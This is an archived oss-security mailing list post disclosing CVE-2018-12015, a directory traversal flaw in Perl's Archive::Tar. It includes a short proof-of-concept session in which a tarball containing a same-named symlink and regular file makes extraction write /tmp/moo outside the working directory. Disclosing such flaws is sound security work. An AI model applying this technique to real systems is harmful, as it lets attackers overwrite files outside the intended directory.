Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 7 Jun 2018 20:41:25 +0200
From: Salvatore Bonaccorso <>
To: OSS Security Mailinglist <>
Subject: Perl: CVE-2018-12015: Archive::Tar: directory traversal vulnerability


The following dirctory traversal vulnerability was reporte to the
Debian bugtracker at , which got
assigned CVE-2018-12015 by MITRE (requested via the

> By default, the Archive::Tar module doesn't allow extracting files
> outside the current working directory. However, you can bypass this
> secure extraction mode easily by putting a symlink and a regular file
> with the same name into the tarball.
> I've attached proof of concept tarball, which makes Archive::Tar create
> /tmp/moo, regardless of what the current working directory is:
>   $ tar -tvvf traversal.tar.gz
>   lrwxrwxrwx root/root         0 2018-06-05 18:55 moo -> /tmp/moo
>   -rw-r--r-- root/root         4 2018-06-05 18:55 moo
>   $ pwd
>   /home/jwilk
>   $ ls /tmp/moo
>   ls: cannot access '/tmp/moo': No such file or directory
>   $ perl -MArchive::Tar -e 'Archive::Tar->extract_archive("traversal.tar.gz")'
>   $ ls /tmp/moo
>   /tmp/moo

The mentioned proof of concept tarball is attached to the Debian bug at;bug=900834;filename=traversal.tar.gz;msg=3


Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ